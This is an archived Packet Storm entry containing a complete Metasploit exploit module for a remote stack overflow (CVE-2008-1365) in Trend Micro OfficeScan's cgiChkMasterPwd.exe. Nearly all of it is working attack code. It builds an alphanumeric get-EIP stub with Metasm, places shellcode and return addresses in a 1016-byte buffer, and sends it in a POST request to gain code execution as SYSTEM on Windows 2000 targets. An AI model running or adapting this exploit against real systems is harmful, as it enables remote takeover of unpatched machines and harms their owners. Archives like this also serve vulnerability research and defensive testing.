Trend Micro OfficeScan Remote Stack Overflow

2009-11-26T00:00:00
ID PACKETSTORM:83133
Type packetstorm
Reporter toto
Modified 2009-11-26T00:00:00

Description

                                        
                                            `require 'msf/core'  
require 'metasm'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Trend Micro OfficeScan Remote Stack Overflow',  
'Description' => %q{  
This module exploits a stack overflow in Trend Micro OfficeScan  
cgiChkMasterPwd.exe (running with SYSTEM privileges).  
  
},  
'Author' => [ 'toto' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2008-1365' ],  
[ 'OSVDB', '42499' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'MinNops' => 0,  
'MaxNops' => 0,  
'Space' => 498,  
'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),  
# clean up to prevent crash on exit  
'Prepend' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "mov dword ptr fs:[0], 0").encode_string,  
'EncoderOptions' =>  
{  
'BufferRegister' => 'ECX',  
},  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>   
[  
# return addresses need to be alphanumeric (here in loadhttp data section)  
[ 'Windows 2000 - Trend Micro OfficeScan 7.3.0.1293)', { 'Rets' => [0x63613035, 0x63613032] } ],  
],  
'DisclosureDate' => 'Jun 28 2007',  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(8080),  
], self.class)  
end  
  
def exploit  
geip_src = "   
push esi  
push esp  
pop eax  
xor esi, [eax]  
push esi  
pop eax  
xor eax, got_eip  
push eax  
pop ecx  
got_eip:  
"  
  
sc = Metasm::Shellcode.assemble(Metasm::Ia32.new, geip_src)  
  
sc.base_addr = target['Rets'][0]  
get_eip = sc.encode_string  
  
pat = Rex::Text.rand_text_alphanumeric(1016)  
  
pat[0, get_eip.length] = get_eip  
pat[14, payload.encoded.length] = payload.encoded  
pat[512, 4] = [target['Rets'][1]].pack('V') # string pointer (to prevent a crash)  
pat[524, 4] = [target['Rets'][0]].pack('V') # sets EIP to the address where the shellcode has been copied  
pat[540, 4] = [target['Rets'][0]-1].pack('V') # shellcode will be copied at this address (+1)  
  
data = "TMlogonEncrypted=!CRYPT!" + pat  
len = sprintf("%u", data.length);  
  
print_status("Trying target address 0x%.8x..." % target['Rets'][0])  
  
res = send_request_cgi({  
'uri' => '/officescan/console/cgi/cgiChkMasterPwd.exe',  
'method' => 'POST',  
'content-type' => 'application/x-www-form-urlencoded',  
'data' => data,  
}, 5)  
  
handler  
end  
  
end  
`